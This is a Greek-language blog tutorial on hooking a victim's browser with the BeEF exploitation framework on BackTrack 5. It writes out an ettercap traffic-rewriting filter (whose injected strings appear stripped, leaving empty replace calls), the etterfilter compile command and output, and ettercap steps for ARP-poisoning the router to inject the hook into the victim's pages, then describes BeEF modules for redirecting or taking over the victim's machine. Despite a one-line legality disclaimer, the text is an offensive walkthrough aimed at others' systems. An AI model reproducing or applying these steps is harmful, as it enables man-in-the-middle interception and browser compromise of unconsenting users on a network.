meta name="poptm" content="dbafe4700287d277c5f53c46b0916f37" /> XL-Satsok Track Ware : Browser explotation framework (BeEF)Πως εισβαλετε σε υπολογιστη μεσω του browser του

Browser explotation framework (BeEF)Πως εισβαλετε σε υπολογιστη μεσω του browser του

Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο Τι θα χρειαστειτε; 1.Backtrack 5 R1 2.Cross-Site-Sctript (xss) πριν αρχισουμε παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα #XL TRACK WARE if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "")) { replace("", " "); msg("EPIASES_LAYRAKI\n"); } if (search(DATA.data, "")) { replace("", " "); msg("epiases_layraki\n"); } } πρεπει να βαλεις την δικια σου ip στο http://192.168.1.66 μετα παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef
παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)
αλλαξε το http://127.0.0.1/beef με την δικια σου ip πχ http://192.168.1.66/beef ,πατα apply config και finished τωρα για να δειτε τι κανει το beEF ακριβως μπορεις να το δοκιμασεις σε εσενα αν πας στο view spawn zombie example και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss Υπαρχουνε παρα πολλες επιλογες οπως να εισβαλετε στον υπολογιστη του να τον ανακατευθυνετε σε αλλη σελιδα κτλ τωρα πως κανουμε το θυμα να ενωθει μαζι μας; ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο και γραφουμε etterfilter /root/Desktop/xssbeef -ο xssbeef.ef μας εμφανιζει αυτο etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file '/root/Desktop/xssbeef' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'filter.ef' done. -> Script encoded into 20 instructions. μετα γραφουμε στο τερματικο ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift+u επιλεγουμε wlan0 μετα ctrl+s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl+f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα